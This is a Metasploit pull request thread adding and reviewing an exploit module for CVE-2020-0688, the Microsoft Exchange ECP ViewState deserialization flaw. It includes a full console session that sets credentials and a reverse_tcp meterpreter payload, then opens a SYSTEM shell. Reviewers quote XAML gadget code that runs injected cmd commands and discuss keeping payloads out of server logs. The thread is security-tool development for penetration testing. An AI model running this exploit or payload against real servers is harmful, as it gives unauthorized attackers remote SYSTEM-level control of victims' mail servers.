Add an exploit for CVE-2020-0688
rapid7/metasploit-framework pull request #13014
Opened 2020-03-02 15:59 UTC by zeroSteiner

This PR adds an exploit module for CVE-2020-0688 (Exchange ECP ViewState Deserialization). The viewstate *must* be transfered via a GET request which means there's some size restrictions, 450 is reliable.

There's a lot of .NET serialization code in here that could potentially be used.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/exchange_ecp_viewstate`
- [ ] Set the `RHOSTS`, `USERNAME`, `PASSWORD` options
    * Note that the `USERNAME` may require a domain to be prefixed to it
- [ ] Run the module and get a shell

## Example
**Tested on Exchange 2016 on Server 2012 x64**

```
msf5 > use exploit/windows/http/exchange_ecp_viewstate
msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
RHOSTS => 192.168.159.129
msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
USERNAME => msflab.local\jdoe
msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
PASSWORD => Password1
msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
TARGET => 1
msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Command Stager progress -   3.61% done (449/12424 bytes)
[*] Command Stager progress -   7.23% done (898/12424 bytes)
[*] Command Stager progress -  10.84% done (1347/12424 bytes)
[*] Command Stager progress -  14.46% done (1796/12424 bytes)
[*] Command Stager progress -  18.07% done (2245/12424 bytes)
[*] Command Stager progress -  21.68% done (2694/12424 bytes)
[*] Command Stager progress -  25.30% done (3143/12424 bytes)
[*] Command Stager progress -  28.91% done (3592/12424 bytes)
[*] Command Stager progress -  32.53% done (4041/12424 bytes)
[*] Command Stager progress -  36.14% done (4490/12424 bytes)
[*] Command Stager progress -  39.75% done (4939/12424 bytes)
[*] Command Stager progress -  43.37% done (5388/12424 bytes)
[*] Command Stager progress -  46.98% done (5837/12424 bytes)
[*] Command Stager progress -  50.60% done (6286/12424 bytes)
[*] Command Stager progress -  54.21% done (6735/12424 bytes)
[*] Command Stager progress -  57.82% done (7184/12424 bytes)
[*] Command Stager progress -  61.44% done (7633/12424 bytes)
[*] Command Stager progress -  65.05% done (8082/12424 bytes)
[*] Command Stager progress -  68.67% done (8531/12424 bytes)
[*] Command Stager progress -  72.28% done (8980/12424 bytes)
[*] Command Stager progress -  75.89% done (9429/12424 bytes)
[*] Command Stager progress -  79.51% done (9878/12424 bytes)
[*] Command Stager progress -  82.74% done (10279/12424 bytes)
[*] Command Stager progress -  86.15% done (10703/12424 bytes)
[*] Command Stager progress -  89.43% done (11111/12424 bytes)
[*] Command Stager progress -  92.91% done (11543/12424 bytes)
[*] Command Stager progress -  96.28% done (11962/12424 bytes)
[*] Sending stage (206403 bytes) to 192.168.159.129
[*] Command Stager progress -  99.84% done (12404/12424 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
[*] Command Stager progress - 100.00% done (12424/12424 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : EXCHANGE
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > 
```

2020-03-02 16:14 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +      OptFloat.new('CMDSTAGER::DELAY', [ true, 'The CMD Stager to use.', 0.5 ]),
I think this option's description is wrong?

2020-03-02 16:16 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +            [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 400 } ]
Very glad you supported `ARCH_CMD` as well.

2020-03-02 16:17 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    return Exploit::CheckCode::Unsupported
Maybe add a reason like `Exploit::CheckCode::Unsupported('Blah blah')`. You can also drop the `return`.

2020-03-02 16:20 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    return Exploit::CheckCode::Unsupported
You can add a reason like `Exploit::CheckCode::Unsupported('Blah blah')`, which is really good if the check is unsupported.

Also, `Exploit` should not be necessary, and you can drop the `return`.

2020-03-02 16:22 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    5.times do |iteration|
Can this number be configurable? Should it be?

2020-03-02 16:23 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +          'destination' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}/#{normalize_uri(target_uri.path, 'owa')}",
Can `full_uri` with `custom_uri` help you here?

2020-03-02 16:25 UTC, wvu requested changes
A mixin for the serialization stuff would be wonderful. It'll definitely come in handy in the future. Amazing work implementing it from scratch.

2020-03-02 17:23 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    5.times do |iteration|
It could be. I originally added it when there was no delay to fix a timeout issue I was having when staging large payloads. Between the incremental backoff and default half-second delay though I've had a much more reliable experience. I don't think I've even noticed it sleeping more than a second.

2020-03-02 17:49 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    5.times do |iteration|
Cool, I think it's fine if it's tuned well.

2020-03-02 17:50 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +        'DisclosureDate' => 'Feb 11 2020',
We generally prefer ISO 8601 dates. Turns out they've been supported all along, but we never used them until recently.

2020-03-02 17:51 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
Can this be a here document?

2020-03-02 17:59 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +        'uri'           => normalize_uri(target_uri.path, 'owa', 'auth.owa'),
I don't think you register `TARGETURI` in this module, so `target_uri.path` defaults to `/` without configurability.

We've discussed registering it in the mixin before, but I think since it's optional to use, we didn't want to confuse module authors. Might be a case for a refactor. cc @adfoster-r7

2020-03-02 18:00 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +        'content-type'  => 'application/x-www-form-urlencoded',
This should already be the default for `send_request_cgi`, but it's fine to be specific.

2020-03-02 18:00 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +          'destination' => full_uri,
Did you want to use this with `custom_uri`? I think you lost some path parts.

2020-03-02 19:45 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
It technically could be, but I'd prefer to remove unnecessary white space to preserve space for the payload. From my understanding a here doc would include newlines and leading white space for indentation. Doing it this way eliminates the white space while preserving readability without require an XML parser to minify it.

2020-03-02 20:00 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
It actually reads a lot cleaner in Vim than it does on GitHub. I've applied whitespace transformations to here docs before, but I think what you've done is plenty readable.

2020-03-02 21:43 UTC, AlanFoster commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
@zeroSteiner A formatter like rubocop will undo this alignment effort, as it will remove the whitespace between the shovel operator and opening the string.

What are your thoughts on

```ruby
dictionary_resource = <<-EOS.lines.map(&:strip).join
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
    <ObjectDataProvider x:Key="" ObjectType="{x:Type Diag:Process}" MethodName="Start">
        <ObjectDataProvider.MethodParameters>
            <System:String>cmd</System:String>
            <System:String>/c #{cmd.encode(:xml => :text)}</System:String>
         </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>
EOS
```

I haven't tested this, but I think we might be able to reduce some chars with shorter xmlns prefixes too:

```ruby
dictionary_resource = <<-EOS.lines.map(&:strip).join
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:S="clr-namespace:System;assembly=mscorlib" xmlns:D="clr-namespace:System.Diagnostics;assembly=system">
    <ObjectDataProvider x:Key="" ObjectType="{x:Type D:Process}" MethodName="Start">
        <ObjectDataProvider.MethodParameters>
            <S:String>cmd</S:String>
            <S:String>/c #{cmd.encode(:xml => :text)}</S:String>
         </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>
EOS
```

2020-03-02 22:09 UTC, AlanFoster commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
A part of me felt this would be cleaner, but it definitely didn't end up that way with all of the extra args to ensure no whitespace is output:

```ruby
resource_dictionary = Nokogiri::XML(<<-EOS, nil, nil, options=Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
<ResourceDictionary
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:System="clr-namespace:System;assembly=mscorlib"
    xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"
>
    <ObjectDataProvider x:Key="" ObjectType="{x:Type Diag:Process}" MethodName="Start">
        <ObjectDataProvider.MethodParameters>
            <System:String>cmd</System:String>
            <System:String>/c #{cmd.encode(:xml => :text)}</System:String>
         </ObjectDataProvider.MethodParameters>
    </ObjectDataProvider>
</ResourceDictionary>
EOS
```

2020-03-02 22:53 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
Awesome, I will give that a shot! Appreciate the effort to maintain readability **and** that precious payload space.

2020-03-02 23:04 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    resource_dictionary  = "<ResourceDictionary "
I like that approach. Last time, I only had to strip leading and trailing whitespace in a here doc, but if I ever need to "compress" the here doc, I'll try that!

2020-03-03 00:03 UTC, busterb commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    CheckCode::Unsupported
Looks like there is a public checker here: https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/

2020-03-03 01:28 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    CheckCode::Unsupported
Yeah that PoC looks just like the one I based the module on. I'm still uncertain regarding remote checking feasibility though. That blog does have a list of vulnerable pages though that I should check to see if the POST method would be accepted. That would increase the usable size and potentially make detection more difficult by keeping the query strings out of the logs.

2020-03-03 16:12 UTC, wvu-r7 commented on lib/msf/util.rb
> +require 'msf/util/dot_net_deserialization'
Please add an EOF newline!

2020-03-03 16:15 UTC, wvu-r7 commented on lib/msf/util.rb
> +require 'msf/util/dot_net_deserialization'
```
wvu@kharak:~/Downloads$ tail util.rb
require 'msf/util/host'

# DBManager helpers
require 'msf/util/db_manager'

# Java deserialization payload generators
require 'msf/util/java_deserialization'

# .NET deserialization payload generators
require 'msf/util/dot_net_deserialization'wvu@kharak:~/Downloads$
```

2020-03-03 17:22 UTC, zeroSteiner commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +    CheckCode::Unsupported
The good news is I think we can reliably check for this vulnerability by obtaining the viewstate, signing it ourselves and comparing the signature. This should prove that we have the necessary information to generate valid, signed viewstates and can therefor leverage the vulnerability. I have a check method implementation done that's working on a true positive case and I'm updating my exchange server now to test on a true negative case.

2020-03-03 23:22 UTC, wvu-r7 commented
Tested and working for me against @zeroSteiner's lab. Stray bugs fixed. Gonna land. Incredible effort, @zeroSteiner aka @smcintyre-r7!

2020-03-03 23:23 UTC, merged

2020-03-03 23:31 UTC, wvu-r7 commented
# Release Notes

This adds a remote `NT AUTHORITY\SYSTEM` exploit against a .NET deserialization vulnerability in the Microsoft Exchange Control Panel, otherwise known as CVE-2020-0688.

2020-03-04 09:51 UTC, 0x9a commented
Hi for use this module need crearted already username and password!!!?

2020-03-04 14:17 UTC, keyunlocker12 commented
How do you know the Username and Password of the Remote Host???

2020-03-04 16:04 UTC, wvu-r7 commented
The password is `hunter2`.

2020-03-11 09:37 UTC, theguly commented
i'm testing this against a proxed instance that redirects based on vhost, and looks like i'm having issue exploiting using this module because of that. i'm sorry but i'm not enough into msf internals and can't debug that much, but using https://www.exploit-db.com/exploits/48153 against the same target it works

2020-03-11 12:36 UTC, zeroSteiner commented
@theguly that issue should have been fixed in #13042.

2020-03-11 12:49 UTC, theguly commented
> @theguly that issue should have been fixed in #13042.

confirmed, sorry for not having thouroughly used search.

2020-05-20 01:51 UTC, wvu-r7 commented on modules/exploits/windows/http/exchange_ecp_viewstate.rb
> +          and decryptionKey values. With knowledge of these, values an attacker
> With knowledge of these, values

Oops. I missed this.